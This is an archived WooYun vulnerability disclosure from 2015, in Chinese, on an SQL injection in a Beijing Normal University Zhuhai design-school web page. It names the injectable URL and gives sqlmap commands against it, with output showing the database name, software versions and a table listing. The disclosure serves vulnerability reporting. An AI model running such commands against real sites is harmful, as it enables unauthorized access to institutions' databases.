乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-03: 细节已通知厂商并且等待厂商处理中 2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开
北京师范大学珠海分校设计学院SQL注入
在网站首页“教学管理”——>“资料下载”。对应的链接(注入点)为:
http://dfi.bnuz.edu.cn/college/article.php?id=44
这里管理员偷懒直接使用的是DFI国际合作项目网站的链接,以前有报道过: WooYun: 669个大学网站都有注入点 但是那个是DFI本站的。这算重复漏洞吗?= =
sqlmap -u "http://dfi.bnuz.edu.cn/college/article.php?id=44" --current-db
得到
[18:37:58] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.4.33back-end DBMS: MySQL 5.0.11[18:37:58] [INFO] fetching current databasecurrent database: 'bnudesign'
继续得到tables
Sqlmap -u "http://dfi.bnuz.edu.cn/college/article.php?id=44" -T bnudesign --tables
Database: information_schema[42 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_CMP || INNODB_CMPMEM_RESET || INNODB_CMP_PER_INDEX || INNODB_CMP_RESET || INNODB_FT_DELETED || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_METRICS || INNODB_SYS_DATAFILES || INNODB_SYS_TABLESTATS || INNODB_TRX || KEY_COLUMN_USAGE || OPTIMIZER_TRACE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+
继续下去应该能得到更多信息。以上。
如上。
过滤。
危害等级:无影响厂商忽略
忽略时间:2015-04-13 16:58
暂无